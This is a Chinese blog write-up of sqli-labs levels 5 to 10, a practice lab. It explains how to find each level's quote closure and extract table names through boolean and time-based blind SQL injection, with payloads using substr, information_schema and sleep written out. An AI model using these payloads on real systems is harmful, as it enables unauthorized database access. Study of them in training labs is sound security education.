首页 > 数据库 >sqli-labs5到10

sqli-labs5到10

时间:2023-05-26 20:03:17浏览次数:32  
标签:10 -- labs5 闭合 sqli 报错 table 盲注 id

第五关

 没有查询信息,盲注,妥妥的

 

?id=1'报错

?id=1'-- -不报错:闭合方式为'

接下来就是一个字母一个字母试了

首先判断库名的长度:?id=1' and length(database())=8-- -正确输出,长度为8

接下来爆出库名为security

 爆出库名爆表名:
?id=1'and  substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1)= 'e'-- -

 那么有人问了,这么多写错了怎么办

好问题,可以先在你的datagrip上编辑,如果可以运行再复制过来

例如这样:

 接下来接着爆吧,不再演示。

第六关

换了个闭合方式:用”闭合,其余跟第五关一样

 第七关

id=1'报错且id=1"不报错,那闭合方式肯定跟 ' 有关了(而且以'开头)

接着id=1'-- -报错,肯定不是单引号闭合,后面还有东西:

id=1')-- -还报错...懂了,加两个 括号:搞定

 

and 1=2试试,直接说sql错误,盲注

 一样的套路

 第八关

闭合方式为'  其余一样

 第九关

上来有点懵,不管输入什么都是you are in ......

时间盲注试试

果然有反应

 接下来的操作跟之前相差不大:

表名字段名一条龙(不如sqlmap)

 ?id=1'and  substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1)= 'e' and sleep(2)-- -

 第十题

依然是时间盲注:
闭合方式为"

这里查看闭合方式的方法为:
id=1' and sleep(2)-- -没有反应就换“ 再没有就接着换。

 

标签:10,--,labs5,闭合,sqli,报错,table,盲注,id
From: https://www.cnblogs.com/limihacker/p/17435659.html

相关文章

  • win10电脑游戏全屏占不满整个屏幕解决方法
    win10电脑游戏全屏占不满整个屏幕解决方法 工具/原料华为MateBookWindows10win10电脑游戏全屏占不满整个屏幕解决方法1按win+r打开并运行,输入regedit,然后按Enter进入注册表编辑器页面;2依次展开以下路径:HEKY_LOCAL_MACHINE/SYSTEM/C......
  • 10分钟,完成变更!内蒙古东胜区政务服务升级之路
    近日,东胜区市民王先生在东胜市民中心进行社会组织团体资质变更办理事宜,往年办理需要好几天的时间对提交的材料进行多重人工审核,今年王先生便提前来到大厅办理。一进门便眼前一新,在工作人员的引导下,王先生先来到窗口进行事项办理,窗口人员通过高速扫描仪仅用了1分钟就完成了所有材料......
  • ASEMI代理韩景元可控硅C106M参数,C106M封装,C106M尺寸
    编辑-Z韩景元可控硅C106M参数:型号:C106M断态重复峰值电压VDRM:600V通态电流IT(RMS):4A通态浪涌电流ITSM:30A平均栅极功耗PG(AV):0.2W峰值门功率耗散PGM:1W工作接点温度Tj:-40~125℃储存温度TSTG:-40~150℃断态重复峰值电流IDRM:≤5uA重复峰值反向电流IRRM:≤5uA栅极非触发电压VGD:≥0.2V C106......
  • day107-过滤器与监听器
    过滤器filter:过滤器用来过滤网站的数据处理中文乱码登陆验证......导入maven包<dependencies><dependency><groupId>javax.servlet</groupId><artifactId>javax.servlet-api</artifactId><version>3.1.0&......
  • CodeForces 1107B Digital root(找规律)
    传送门每个数字都有个数位和,就是把数字的每一位相加直到数位和是一个个位数。然后题目就要你求第K个数位和为X的数字是多少。写一些数字出来就很容易发现规律了可以看出每一竖列的数位和是相等的,然后就找到规律是9*(k-1)+x,注意数据范围是1e12,是longlong,然后就这么多,就可以直......
  • CodeForces 1107A Digits Sequence Dividing(思维)
    传送门唉,题目讲的天花乱坠的,花里胡哨,一上来真是把我唬住了。愣了半天也没看出来到底咋做,后来借助翻译明白了这个题就是让你把一串字符分成两串,然后第一串要比第二串小,就这样,然后又是个SpecialJudge。做的时候就把第一个数作为第一个串,然后串长如果为2,就判断一下后面的串要比第一个......
  • HDU 1029 Ignatius and the Princess IV(基础dp)
    传送门题目大意就是给你n个数(保证n为一个奇数),存在一个数出现的次数大于(n+1)/2次,求这个数;这个数出现的次数比其他数出现的次数加起来还多,那么当这个数出现时+1,其他的数出现时-1,最后得到的数为正数。假定一个数为特殊数,若当前数与特殊数相同则cnt++,若不相同则cnt--,如果这时cnt<0,用当......
  • CodeForces 1108B Divisors of Two Integers(思维)
    传送门题目大意就是给你由X,Y两个数的所有因子(包括一和数本身)组成的序列,然后通过这个序列找出这两个数。由此可见,序列里最大的数一定是X或Y其中的一个,然后我们的任务就是找另一个了,我找的是剩下的因子里不能被已找到的那个数整除的数中最大的数,且没有和这个数相同的数。#include<std......
  • CodeForces 1105B Zuhair and Strings(思维 + 枚举)
    传送门题目大意就是给你一个字符串,还有一个等级K,K的具体含义就是连续的相同的字符串的个数,题目就是要求长度为k的,字符一样的子串有几个,如果k==2就是比如aa,bb,cc,dd,..... 这样的,注意不能重叠。因为题目给的数据范围在2e5,所以枚举从a到z,然后取最大值就好了。代码如下#incl......
  • HDU 1024 Max Sum Plus Plus(动态规划)
    传送门题意是给你个数字序列,现在让你把这个序列分成m个连续的子序列,且要求这m个子序列的累加和最大。思路:这道题的题意可以理解为问在序列为末尾时,把序列分为m个子序列这个状态时的最大累加和,那么可以得出这个状态应该是由上一个状态转移得来:(因为dp[i][j]表示数到第j个字符时,前j个......